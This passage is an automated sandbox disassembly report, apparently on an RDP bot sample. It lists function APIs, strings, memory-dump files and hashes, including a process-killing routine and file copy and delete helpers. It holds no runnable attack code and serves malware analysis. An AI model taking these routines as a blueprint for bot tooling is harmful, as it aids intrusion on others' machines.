[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115076E0, 00007FFE11507713
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FFE11507705

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-1574117953
Opcode ID: 1f085ad19fe6e333bef82a8e5425ff26d6f1eae8eee5a8ffb35007b3cbb61f15
Instruction ID: 983873925c277e3384035cb136718335c7386896955aa054e6a31ff673404161
Opcode Fuzzy Hash: 1f085ad19fe6e333bef82a8e5425ff26d6f1eae8eee5a8ffb35007b3cbb61f15
Instruction Fuzzy Hash: 8B51B462E0CD4382FB654B96994077C2259AF007B8F1846FAC99E4B6F4DF3CAD85C381

Function 00007FFE13305056 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE133050B5
GetFileTime.KERNEL32 ref: 00007FFE133050D0
GetLastError.KERNEL32 ref: 00007FFE133050DE
CloseHandle.KERNEL32 ref: 00007FFE13305200

Strings

fs_file_stat, xrefs: 00007FFE13305119, 00007FFE1330514C
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FFE13305145
(path != NULL), xrefs: 00007FFE13305112
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13305120, 00007FFE13305153
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1330510B, 00007FFE1330513E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-1574117953
Opcode ID: bd7ff0fafd328c122103e5875d3c7eab560b0812f8e46e29c44e62deda488365
Instruction ID: 200f742386779a669fe94d9b168b3ab503fa0e4f093d5002c96324b71abdd64d
Opcode Fuzzy Hash: bd7ff0fafd328c122103e5875d3c7eab560b0812f8e46e29c44e62deda488365
Instruction Fuzzy Hash: C4518361E0D943CAFB684A12D9047BD6150AF20778F1842B1C93DBB2F5DF2CAC858749

Function 00007FFE13309200 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1330929E
strtol.MSVCRT ref: 00007FFE133092B4
_errno.MSVCRT ref: 00007FFE133092BC
_errno.MSVCRT ref: 00007FFE133092C4

Strings

[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE133092EC
ini_get_uint16, xrefs: 00007FFE1330927D, 00007FFE133092E5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13309284
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1330926F
(value != NULL), xrefs: 00007FFE13309276

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1951032453
Opcode ID: 2e22015499f05fa448b848c51125f962de21535905407a7e38088b164924903e
Instruction ID: 95168317e7b0246f74aa116cbf6aa17151a7347cc20fe8eeab8f4dfdfcc6e611
Opcode Fuzzy Hash: 2e22015499f05fa448b848c51125f962de21535905407a7e38088b164924903e
Instruction Fuzzy Hash: 5E21BF31A08A47D9E7109B12E840BAA7764BBA47A4F400171EE6C17B75DF3CE846C708

Function 00007FFE13309380 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1330941A
_errno.MSVCRT ref: 00007FFE13309438
_errno.MSVCRT ref: 00007FFE13309444

Strings

[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE1330946B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13309400
ini_get_uint32, xrefs: 00007FFE133093F9, 00007FFE13309464
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE133093EB
(value != NULL), xrefs: 00007FFE133093F2

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-719680006
Opcode ID: 8febc99b48bfe99b21b927318c7ea454f6280b9247d5a0dd86312abad2330ed3
Instruction ID: 480a88dff5f967c834f337547f59c1e532705df0c1778ddfc135ed044876dcc7
Opcode Fuzzy Hash: 8febc99b48bfe99b21b927318c7ea454f6280b9247d5a0dd86312abad2330ed3
Instruction Fuzzy Hash: FD21D162A08E46DEE7208F26F8407AE7364BB647A4F4401B2EE5C576B5CF3CE845CB04

Function 00007FFE0EB49B04 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE0EB49A19
Process32Next.KERNEL32 ref: 00007FFE0EB49A2F
strcmp.MSVCRT ref: 00007FFE0EB49A71
OpenProcess.KERNEL32 ref: 00007FFE0EB49A89
TerminateProcess.KERNEL32 ref: 00007FFE0EB49AA3
GetLastError.KERNEL32 ref: 00007FFE0EB49AB1
GetLastError.KERNEL32 ref: 00007FFE0EB49C88

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE0EB49AC3
process_kill, xrefs: 00007FFE0EB49ABC

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 477549591-1116693529
Opcode ID: 2ad748291eabf6316bf7f716528a36c01ee9cfa80688fbb5b07d7067bf160f7f
Instruction ID: 0d3e9f5587720cdc6ce509c1accaa2c313d2538bb67d66828e9da8521c238f09
Opcode Fuzzy Hash: 2ad748291eabf6316bf7f716528a36c01ee9cfa80688fbb5b07d7067bf160f7f
Instruction Fuzzy Hash: 27219DA2B0C70356FAB59F15A19437B16D1EFC5B80F085035CDCE4A2B5EE2DEC488E80

Function 00007FFE115120EE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFE115120FE
GetProcAddress.KERNEL32 ref: 00007FFE11512115
LoadLibraryW.KERNEL32 ref: 00007FFE11512123
GetProcAddress.KERNEL32 ref: 00007FFE11512133

Strings

advapi32.dll, xrefs: 00007FFE1151211C
msvcrt.dll, xrefs: 00007FFE115120F7
SystemFunction036, xrefs: 00007FFE11512129
rand_s, xrefs: 00007FFE1151210B

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 8841966da993e30bbd5ab2c158156969493ba5c8471771cc3d252178fb708fc7
Instruction ID: 25e446ba5fd779a13d65faf33b32b5a01d7a9f46af7a8650c0528916d144b1df
Opcode Fuzzy Hash: 8841966da993e30bbd5ab2c158156969493ba5c8471771cc3d252178fb708fc7
Instruction Fuzzy Hash: CDF0D465E4BE1BD4EF06DB53FC504A427AAAF897B0B9405B2C80D02370EF2CA54AC300

Function 00007FFE1330E59E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFE1330E5AE
GetProcAddress.KERNEL32 ref: 00007FFE1330E5C5
LoadLibraryW.KERNEL32 ref: 00007FFE1330E5D3
GetProcAddress.KERNEL32 ref: 00007FFE1330E5E3

Strings

SystemFunction036, xrefs: 00007FFE1330E5D9
msvcrt.dll, xrefs: 00007FFE1330E5A7
advapi32.dll, xrefs: 00007FFE1330E5CC
rand_s, xrefs: 00007FFE1330E5BB

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 8e652e63ee7d6c79b182f84b0a244bf925ea7da987e58bba6fe3b7ef82a224eb
Instruction ID: f550b64dcd3a628401137f0c33e54f54dddd704b6a6cc198509a188e99198266
Opcode Fuzzy Hash: 8e652e63ee7d6c79b182f84b0a244bf925ea7da987e58bba6fe3b7ef82a224eb
Instruction Fuzzy Hash: 0AF0B720A0AE17D9EE05DB53FC500B827A4BF687A0B4406B6C82D76375FF2CE55AC308

Function 00007FFE11506B71 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FFE11506C0F
GetLastError.KERNEL32 ref: 00007FFE11506C2A

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FFE11506C48
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FFE11506BE5
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FFE11506D96
fs_file_copy, xrefs: 00007FFE11506BDE, 00007FFE11506C41, 00007FFE11506D8F
NULL, xrefs: 00007FFE11506D6D, 00007FFE11506D79

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 9602df945be126a78eb9839a344b0b067acd0e49c73a6f61a765f3d0829be5e2
Instruction ID: 1786dee3d873af6daf08d780bde201b51aa99c8f025673af451ab22b221a9fda
Opcode Fuzzy Hash: 9602df945be126a78eb9839a344b0b067acd0e49c73a6f61a765f3d0829be5e2
Instruction Fuzzy Hash: 764182E6D1CE1785FB315A97E44037D265D7F04BB8F2401BADD0F4A6B0EEACA6818321

Function 00007FFE133045B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FFE1330464F
GetLastError.KERNEL32 ref: 00007FFE1330466A

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FFE133047D6
fs_file_copy, xrefs: 00007FFE1330461E, 00007FFE13304681, 00007FFE133047CF
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FFE13304625
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FFE13304688
NULL, xrefs: 00007FFE133047AD, 00007FFE133047B9

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 71f428511ad1387fb65e5609385e09bfa4816190db5767a95bb3a0b10491a7de
Instruction ID: cf35dfefdc387f12b61e3cd7a0711d1edf60e947f3367abeac9e54f1d21bc262
Opcode Fuzzy Hash: 71f428511ad1387fb65e5609385e09bfa4816190db5767a95bb3a0b10491a7de
Instruction Fuzzy Hash: EC41B455D0CE1A99FA244A87A4007BD16547F21BBCE0401B2D93F776B1EE5CEB81CB0D

Function 00007FFE115065A5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FFE115065BC
GetLastError.KERNEL32 ref: 00007FFE11506613

Strings

fs_file_delete, xrefs: 00007FFE115065F5, 00007FFE11506621, 00007FFE11506751
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11506628
NULL, xrefs: 00007FFE11506742
[I] (%s) -> Done(path=%s), xrefs: 00007FFE11506758
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE115065FC

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 4f32487ad11511cab57dacbea496314a160be058fe107193b659323eb624b3df
Instruction ID: 794db594a5160f9f35b59a513a2300a3e3daea8986e5f23894ba15679650b6e4
Opcode Fuzzy Hash: 4f32487ad11511cab57dacbea496314a160be058fe107193b659323eb624b3df
Instruction Fuzzy Hash: 93313951E0DE1B82FB319B9BE8407BD22495F50374F6900BAC91E4B2F5FD6DA9818322

Function 00007FFE13303FE5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FFE13303FFC
GetLastError.KERNEL32 ref: 00007FFE13304053

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1330403C
[I] (%s) -> Done(path=%s), xrefs: 00007FFE13304198
fs_file_delete, xrefs: 00007FFE13304035, 00007FFE13304061, 00007FFE13304191
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FFE13304068
NULL, xrefs: 00007FFE13304182

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 70a665a64a522c0d3cbc215f0aa026ba96beff9f02ad04497d524d0d72159267
Instruction ID: 9564f6941592a55dfd508c156184715615c532ce5c49ee074297fa80b54d7703
Opcode Fuzzy Hash: 70a665a64a522c0d3cbc215f0aa026ba96beff9f02ad04497d524d0d72159267
Instruction Fuzzy Hash: 8F316D51E0CE0A8AFA24961BF5503BD62415F70374F1404B2C97E377B6ED1DAE85AB0A

Function 00007FFE11502D14 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11502D4E
strlen.MSVCRT ref: 00007FFE11502D59

Strings

str_match, xrefs: 00007FFE11502D8B, 00007FFE11502DC4, 00007FFE11502DFD
(needle != NULL), xrefs: 00007FFE11502D84
(pattern != NULL), xrefs: 00007FFE11502DBD
((match == NULL) || (match_len != NULL)), xrefs: 00007FFE11502DF6
H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FFE11502D7D, 00007FFE11502DB6, 00007FFE11502DEF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11502D92, 00007FFE11502DCB, 00007FFE11502E04

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-2979476222
Opcode ID: 28e28fe22df28801ee0245a04dc4fec4bfebef32c345413e74c9e58db5eccbf1
Instruction ID: 8b486283412d31494c8beb02d578355097668aeb7787ec60d846617fc6e01484
Opcode Fuzzy Hash: 28e28fe22df28801ee0245a04dc4fec4bfebef32c345413e74c9e58db5eccbf1
Instruction Fuzzy Hash: 4A51B392B0DD8359FF258A97A9107BD265A7F007E8F4840BADE4E0B6B5DF6CED458300

Function 00007FFE13309F94 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13309FCE
strlen.MSVCRT ref: 00007FFE13309FD9

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1330A012, 00007FFE1330A04B, 00007FFE1330A084
(needle != NULL), xrefs: 00007FFE1330A004
str_match, xrefs: 00007FFE1330A00B, 00007FFE1330A044, 00007FFE1330A07D
((match == NULL) || (match_len != NULL)), xrefs: 00007FFE1330A076
H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FFE13309FFD, 00007FFE1330A036, 00007FFE1330A06F
(pattern != NULL), xrefs: 00007FFE1330A03D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-2979476222
Opcode ID: 256b97451d981dea282954d276a58f70d48f812c3a5c18dd3d3815c3919d25ec
Instruction ID: 50278e5daf176919bcd136693cc0458d7f0a1541fed0cf0b4b64e47fffd164eb
Opcode Fuzzy Hash: 256b97451d981dea282954d276a58f70d48f812c3a5c18dd3d3815c3919d25ec
Instruction Fuzzy Hash: 9851D291A0CD8B89FA598A17F9107BD16517B317A8F4442B2DD2E372F2DE2DE5068308

Function 00007FFE11509EE7 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

EnterCriticalSection.KERNEL32 ref: 00007FFE11509F1F
GetProcessHeap.KERNEL32 ref: 00007FFE11509F7B
HeapFree.KERNEL32 ref: 00007FFE11509F8C
LeaveCriticalSection.KERNEL32 ref: 00007FFE11509FAF

Strings

[D] (%s) -> Requested(handler=0x%p), xrefs: 00007FFE11509EFA
ebus_unsubscribe, xrefs: 00007FFE11509EF3, 00007FFE11509F95, 00007FFE11509FCC
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11509F9C
[E] (%s) -> Failed(handler=0x%p), xrefs: 00007FFE11509FD3

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

